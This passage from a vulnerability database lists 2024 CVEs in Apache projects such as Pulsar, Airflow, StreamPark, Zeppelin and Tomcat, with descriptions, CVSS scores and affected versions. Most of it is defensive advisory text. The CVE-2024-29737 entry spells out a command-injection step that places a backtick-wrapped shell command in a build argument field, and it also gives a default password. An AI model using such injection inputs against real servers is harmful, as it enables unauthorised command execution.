permitted, enabling the creation of functions using URLs that match the defined patterns. This approach ensures that the feature remains available to those who require it, while limiting the potential for unauthorized access and exploitation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-27905

** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora. An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache aurora *
CVE-2024-27906

Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated users to view DAG code and import errors of DAGs they do not have permission to view through the API and the UI. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-28098

The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6. 2.11 Apache Pulsar users should upgrade to at least 2.11.4. 3.0 Apache Pulsar users should upgrade to at least 3.0.3. 3.1 Apache Pulsar users should upgrade to at least 3.1.3. 3.2 Apache Pulsar users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 3.1 2.7

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-28148

An authenticated user could potentially access metadata for a datasource they are not authorized to view by submitting a targeted REST API request.This issue affects Apache Superset: before 3.1.2. Users are recommended to upgrade to version 3.1.2 or above, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-28168

Improper Restriction of XML External Entity Reference ('XXE') vulnerability in Apache XML Graphics FOP. This issue affects Apache XML Graphics FOP: 2.9. Users are recommended to upgrade to version 2.10, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache formatting_objects_processor 2.9
CVE-2024-28746

Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access.  Users of Apache Airflow are recommended to upgrade to version 2.8.3 or newer to mitigate the risk associated with this vulnerability

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-28752

A SSRF vulnerability using the Aegis DataBinding in versions of Apache CXF before 4.0.4, 3.6.3 and 3.5.8 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. Users of other data bindings (including the default databinding) are not impacted.

Products Affected

Vendor Product Version
apache cxf *
netapp ontap_tools 10
netapp oncommand_workflow_automation -
CVE-2024-29006

By default the CloudStack management server honours the x-forwarded-for HTTP header and logs it as the source IP of an API request. This could lead to authentication bypass and other operational problems should an attacker decide to spoof their IP address this way. Users are recommended to upgrade to CloudStack version 4.18.1.1 or 4.19.0.1, which fixes this issue.

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.19.0.0
CVE-2024-29007

The CloudStack management server and secondary storage VM could be tricked into making requests to restricted or random resources by means of following 301 HTTP redirects presented by external servers when downloading templates or ISOs. Users are recommended to upgrade to version 4.18.1.1 or 4.19.0.1, which fixes this issue.

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.19.0.0
CVE-2024-29008

A problem has been identified in the CloudStack additional VM configuration (extraconfig) feature which can be misused by anyone who has privilege to deploy a VM instance or configure settings of an already deployed VM instance, to configure additional VM configuration even when the feature is not explicitly enabled by the administrator. In a KVM based CloudStack environment, an attacker can exploit this issue to attach host devices such as storage disks, and PCI and USB devices such as network adapters and GPUs, in a regular VM instance that can be further exploited to gain access to the underlying network and storage infrastructure resources, and access any VM instance disks on the local storage. Users are advised to upgrade to version 4.18.1.1 or 4.19.0.1, which fixes this issue.

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.19.0.0
CVE-2024-29070

On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend service returns "Authorization" as the front-end authentication credential. "Authorization" can still initiate requests and access data even after logout. Mitigation: all users should upgrade to 2.1.4

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29120

In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return "Authorization" as the front-end authentication credential. User can use this credential to request other users' information, including the administrator's username, password, salt value, etc.  Mitigation: all users should upgrade to 2.1.4

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29131

Out-of-bounds Write vulnerability in Apache Commons Configuration.This issue affects Apache Commons Configuration: from 2.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_configuration *
netapp snapcenter -
fedoraproject fedora 39
netapp ontap_tools 10
fedoraproject fedora 40
CVE-2024-29133

Out-of-bounds Write vulnerability in Apache Commons Configuration.This issue affects Apache Commons Configuration: from 2.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_configuration *
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-29178

On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability. Mitigation: all users should upgrade to 2.1.4

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29217

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer.This issue affects Apache Answer: before 1.3.0. XSS attack when user changes personal website. A logged-in user, when modifying their personal website, can input malicious code in the website to create such an attack. Users are recommended to upgrade to version [1.3.0], which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-29733

Improper Certificate Validation vulnerability in Apache Airflow FTP Provider. The FTP hook lacks complete certificate validation in FTP_TLS connections, which can potentially be leveraged. Implementing proper certificate validation by passing context=ssl.create_default_context() during FTP_TLS instantiation is used as mitigation to validate the certificates properly. This issue affects Apache Airflow FTP Provider: before 3.7.0. Users are recommended to upgrade to version 3.7.0, which fixes the issue.

Products Affected

Vendor Product Version
apache apache-airflow-providers-ftp *
CVE-2024-29735

Improper Preservation of Permissions vulnerability in Apache Airflow.This issue affects Apache Airflow from 2.8.2 through 2.8.3. Airflow's local file task handler in Airflow incorrectly set permissions for all parent folders of log folder, in default configuration adding write access to Unix group of the folders. In the case Airflow is run with the root user (not recommended) it added group write permission to all folders up to the root of the filesystem. If your log files are stored in the home directory, these permission changes might impact your ability to run SSH operations after your home directory becomes group-writeable. This issue does not affect users who use or extend Airflow using Official Airflow Docker reference images ( https://hub.docker.com/r/apache/airflow/ ) - those images require to have group write permission set anyway. You are affected only if you install Airflow using local installation / virtualenv or other Docker images, but the issue has no impact if docker containers are used as intended, i.e. where Airflow components do not share containers with other applications and users. Also you should not be affected if your umask is 002 (group write enabled) - this is the default on many linux systems. Recommendation for users using Airflow outside of the containers: * if you are using root to run Airflow, change your Airflow user to use non-root * upgrade Apache Airflow to 2.8.4 or above * If you prefer not to upgrade, you can change the https://airflow.apache.org/docs/apache-airflow/stable/configurations-ref.html#file-task-handler-new-folder-permissions  to 0o755 (original value 0o775). * if you already ran Airflow tasks before and your default umask is 022 (group write disabled) you should stop Airflow components, check permissions of AIRFLOW_HOME/logs in all your components and all parent directories of this directory and remove group write access for all the parent directories

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-29736

A SSRF vulnerability in WADL service description in versions of Apache CXF before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform SSRF style attacks on REST webservices. The attack only applies if a custom stylesheet parameter is configured.

Products Affected

Vendor Product Version
apache cxf *
CVE-2024-29737

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4 Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injection command will be successfully executed after executing the build. In the latest version, the special symbol ` is intercepted.

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-29834

This vulnerability allows authenticated users with produce or consume permissions to perform unauthorized operations on partitioned topics, such as unloading topics and triggering compaction. These management operations should be restricted to users with the tenant admin role or superuser role. An authenticated user with produce permission can create subscriptions and update subscription properties on partitioned topics, even though this should be limited to users with consume permissions. This impact analysis assumes that Pulsar has been configured with the default authorization provider. For custom authorization providers, the impact could be slightly different. Additionally, the vulnerability allows an authenticated user to read, create, modify, and delete namespace properties in any namespace in any tenant. In Pulsar, namespace properties are reserved for user provided metadata about the namespace. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.6, from 2.11.0 to 2.11.4, from 3.0.0 to 3.0.3, from 3.1.0 to 3.1.3, and from 3.2.0 to 3.2.1. 3.0 Apache Pulsar users should upgrade to at least 3.0.4. 3.1 and 3.2 Apache Pulsar users should upgrade to at least 3.2.2. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 3.1 2.7

Products Affected

Vendor Product Version
apache pulsar *
CVE-2024-29868

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism. This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account. This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-29869

Hive creates a credentials file to a temporary directory in the file system with permissions 644 by default when the file permissions are not set explicitly. Any unauthorized user having access to the directory can read the sensitive information written into this file. Users are recommended to upgrade to version 4.0.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

Products Affected

Vendor Product Version
apache hive *
CVE-2024-30188

File read and write vulnerability in Apache DolphinScheduler ,  authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler: from 3.1.0 before 3.2.2. Users are recommended to upgrade to version 3.2.2, which fixes the issue.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2024-30471

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration. This allows an attacker to potentially request the creation of multiple accounts with the same email address until the email address is registered, creating many identical users and corrupting StreamPipe's user management. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-31141

Files or Directories Accessible to External Parties, Improper Privilege Management vulnerability in Apache Kafka Clients. Apache Kafka Clients accept configuration data for customizing behavior, and includes ConfigProvider plugins in order to manipulate these configurations. Apache Kafka also provides FileConfigProvider, DirectoryConfigProvider, and EnvVarConfigProvider implementations which include the ability to read from disk or environment variables. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use these ConfigProviders to read arbitrary contents of the disk and environment variables. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment access, which may be undesirable in certain environments, including SaaS products. This issue affects Apache Kafka Clients: from 2.3.0 through 3.5.2, 3.6.2, 3.7.0. Users with affected applications are recommended to upgrade kafka-clients to version >=3.8.0, and set the JVM system property "org.apache.kafka.automatic.config.providers=none". Users of Kafka Connect with one of the listed ConfigProvider implementations specified in their worker config are also recommended to add appropriate "allowlist.pattern" and "allowed.paths" to restrict their operation to appropriate bounds. For users of Kafka Clients or Kafka Connect in environments that trust users with disk and environment variable access, it is not recommended to set the system property. For users of the Kafka Broker, Kafka MirrorMaker 2.0, Kafka Streams, and Kafka command-line tools, it is not recommended to set the system property.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache kafka *
apache kafka 3.7.0
CVE-2024-31309

HTTP/2 CONTINUATION DoS attack can cause Apache Traffic Server to consume more resources on the server.  Version from 8.0.0 through 8.1.9, from 9.0.0 through 9.2.3 are affected. Users can set a new setting (proxy.config.http2.max_continuation_frames_per_minute) to limit the number of CONTINUATION frames per minute.  ATS does have a fixed amount of memory a request can use and ATS adheres to these limits in previous releases. Users are recommended to upgrade to versions 8.1.10 or 9.2.4 which fixes the issue.

Products Affected

Vendor Product Version
fedoraproject fedora 38
debian debian_linux 10.0
apache traffic_server *
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-31391

Insertion of Sensitive Information into Log File vulnerability in the Apache Solr Operator. This issue affects all versions of the Apache Solr Operator from 0.3.0 through 0.8.0. When asked to bootstrap Solr security, the operator will enable basic authentication and create several accounts for accessing Solr: including the "solr" and "admin" accounts for use by end-users, and a "k8s-oper" account which the operator uses for its own requests to Solr. One common source of these operator requests is healthchecks: liveness, readiness, and startup probes are all used to determine Solr's health and ability to receive traffic. By default, the operator configures the Solr APIs used for these probes to be exempt from authentication, but users may specifically request that authentication be required on probe endpoints as well. Whenever one of these probes would fail, if authentication was in use, the Solr Operator would create a Kubernetes "event" containing the username and password of the "k8s-oper" account. Within the affected version range, this vulnerability affects any solrcloud resource which (1) bootstrapped security through use of the `.solrOptions.security.authenticationType=basic` option, and (2) required authentication be used on probes by setting `.solrOptions.security.probesRequireAuth=true`. Users are recommended to upgrade to Solr Operator version 0.8.1, which fixes this issue by ensuring that probes no longer print the credentials used for Solr requests.  Users may also mitigate the vulnerability by disabling authentication on their healthcheck probes using the setting `.solrOptions.security.probesRequireAuth=false`.

Products Affected

Vendor Product Version
apache solr_operator *
CVE-2024-31411

Unrestricted Upload of File with dangerous type vulnerability in Apache StreamPipes. Such a dangerous type might be an executable file that may lead to a remote code execution (RCE). The unrestricted upload is only possible for authenticated and authorized users. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-31860

Improper Input Validation vulnerability in Apache Zeppelin. By adding relative path indicators(E.g ..), attackers can see the contents for any files in the filesystem that the server account can access.  This issue affects Apache Zeppelin: from 0.9.0 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31862

Improper Input Validation vulnerability in Apache Zeppelin when creating a new note from Zeppelin's UI.This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31863

Authentication Bypass by Spoofing vulnerability by replacing to exsiting notes in Apache Zeppelin.This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0. Users are recommended to upgrade to version 0.11.0, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin 0.10.1
CVE-2024-31864

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin. The attacker can inject sensitive configuration or malicious code when connecting MySQL database via JDBC driver. This issue affects Apache Zeppelin: before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31865

Improper Input Validation vulnerability in Apache Zeppelin. The attackers can call updating cron API with invalid or improper privileges so that the notebook can run with the privileges. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31866

Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin. The attackers can execute shell scripts or malicious code by overriding configuration like ZEPPELIN_INTP_CLASSPATH_OVERRIDES. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31867

Improper Input Validation vulnerability in Apache Zeppelin. The attackers can execute malicious queries by setting improper configuration properties to LDAP search filter. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31868

Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin. The attackers can modify helium.json and exposure XSS attacks to normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-31979

Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements. Previously, StreamPipes allowed users to configure custom endpoints from which to install additional pipeline elements. These endpoints were not properly validated, allowing an attacker to get StreamPipes to send an HTTP GET request to an arbitrary address. This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-32007

An improper input validation of the p2c parameter in the Apache CXF JOSE code before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform a denial of service attack by specifying a large value for this parameter in a token. 

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache cxf *
CVE-2024-32077

Apache Airflow version 2.9.0 has a vulnerability that allows an authenticated attacker to inject malicious data into the task instance logs.  Users are recommended to upgrade to version 2.9.1, which fixes this issue.

Products Affected

Vendor Product Version
apache airflow 2.9.0
CVE-2024-32113

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13. Users are recommended to upgrade to version 18.12.13, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-32114

In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST API). To mitigate, users can update the default conf/jetty.xml configuration file to add authentication requirement: <bean id="securityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping">   <property name="constraint" ref="securityConstraint" />   <property name="pathSpec" value="/" /> </bean> Or we encourage users to upgrade to Apache ActiveMQ 6.1.2 where the default configuration has been updated with authentication by default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:H 2.1 5.8

Products Affected

Vendor Product Version
apache activemq *
CVE-2024-32638

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in Apache APISIX when using `forward-auth` plugin.This issue affects Apache APISIX: from 3.8.0, 3.9.0. Users are recommended to upgrade to version 3.8.1, 3.9.1 or higher, which fixes the issue.

Products Affected

Vendor Product Version
apache apisix 3.9.0
apache apisix 3.8.0
CVE-2024-32838

SQL Injection vulnerability in various API endpoints - offices, dashboards, etc. Apache Fineract versions 1.9 and before have a vulnerability that allows an authenticated attacker to inject malicious data into some of the REST API endpoints' query parameter.  Users are recommended to upgrade to version 1.10.1, which fixes this issue. A SQL Validator has been implemented which allows us to configure a series of tests and checks against our SQL queries that will allow us to validate and protect against nearly all potential SQL injection attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-34365

** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Karaf Cave.This issue affects all versions of Apache Karaf Cave. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache karaf_cave *
CVE-2024-34457

On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config. Mitigation: all users should upgrade to 2.1.4

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-34693

Improper Input Validation vulnerability in Apache Superset, allows for an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow for local infile, it's possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content on a MariaDB database table.This issue affects Apache Superset: before 3.1.3 and version 4.0.0 Users are recommended to upgrade to version 4.0.1 or 3.1.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 2.3 4.0

Products Affected

Vendor Product Version
apache superset *
CVE-2024-34750

Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.0-M1 through 9.0.89. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M21, 10.1.25 or 9.0.90, which fixes the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
netapp ontap_tools 9
CVE-2024-35161

Apache Traffic Server forwards malformed HTTP chunked trailer section to origin servers. This can be utilized for request smuggling and may also lead cache poisoning if the origin servers are vulnerable. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4. Users can set a new setting (proxy.config.http.drop_chunked_trailers) not to forward chunked trailer section. Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-35164

The terminal emulator of Apache Guacamole 1.5.5 and older does not properly validate console codes received from servers via text-based protocols like SSH. If a malicious user has access to a text-based connection, a specially-crafted sequence of console codes could allow arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache guacamole *
CVE-2024-35296

Invalid Accept-Encoding header can cause Apache Traffic Server to fail cache lookup and force forwarding requests. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4. Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-36104

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14. Users are recommended to upgrade to version 18.12.14, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-36263

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Submarine Server Core. This issue affects Apache Submarine Server Core: all versions. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache submarine *
CVE-2024-36264

** UNSUPPORTED WHEN ASSIGNED ** Improper Authentication vulnerability in Apache Submarine Commons Utils. If the user doesn't explicitly set `submarine.auth.default.secret`, a default value will be used. This issue affects Apache Submarine Commons Utils: from 0.8.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache submarine *
CVE-2024-36265

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Submarine Server Core. This issue affects Apache Submarine Server Core: from 0.8.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache submarine *
CVE-2024-36268

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong. This issue affects Apache InLong: from 1.10.0 through 1.12.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong's 1.13.0 or cherry-pick [1] to solve it. [1]  https://github.com/apache/inlong/pull/10251

Products Affected

Vendor Product Version
apache inlong *
CVE-2024-36387

Serving WebSocket protocol upgrades over a HTTP/2 connection could result in a Null Pointer dereference, leading to a crash of the server process, degrading performance.

Products Affected

Vendor Product Version
apache http_server *
netapp ontap 9
CVE-2024-36448

** UNSUPPORTED WHEN ASSIGNED ** Server-Side Request Forgery (SSRF) vulnerability in Apache IoTDB Workbench. This issue affects Apache IoTDB Workbench: from 0.13.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache iotdb_workbench *
CVE-2024-36471

Import functionality is vulnerable to DNS rebinding attacks between verification and processing of the URL.  Project administrators can run these imports, which could cause Allura to read from internal services and expose them. This issue affects Apache Allura from 1.0.1 through 1.16.0. Users are recommended to upgrade to version 1.17.0, which fixes the issue. If you are unable to upgrade, set "disable_entry_points.allura.importers = forge-tracker, forge-discussion" in your .ini config file.

Products Affected

Vendor Product Version
apache allura *
CVE-2024-36522

The default configuration of XSLTResourceStream.java is vulnerable to remote code execution via XSLT injection when processing input from an untrusted source without validation. Users are recommended to upgrade to versions 10.1.0, 9.18.0 or 8.16.0, which fix this issue.

Products Affected

Vendor Product Version
apache wicket 10.0.0
apache wicket *
CVE-2024-37358

Similarly to CVE-2024-34055, Apache James is vulnerable to denial of service through the abuse of IMAP literals from both authenticated and unauthenticated users, which could be used to cause unbounded memory allocation and very long computations Version 3.7.6 and 3.8.2 restrict such illegitimate use of IMAP literals.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H 3.9 4.0

Products Affected

Vendor Product Version
apache james_server *
CVE-2024-37389

Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache nifi 2.0.0
apache nifi *
CVE-2024-38286

Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.13 through 9.0.89. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.35 through 8.5.100 and 7.0.92 through 7.0.109. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M21, 10.1.25, or 9.0.90, which fixes the issue. Apache Tomcat, under certain configurations on any platform, allows an attacker to cause an OutOfMemoryError by abusing the TLS handshake process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H 3.9 4.0

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
netapp ontap_tools 10
netapp ontap_tools 9
CVE-2024-38311

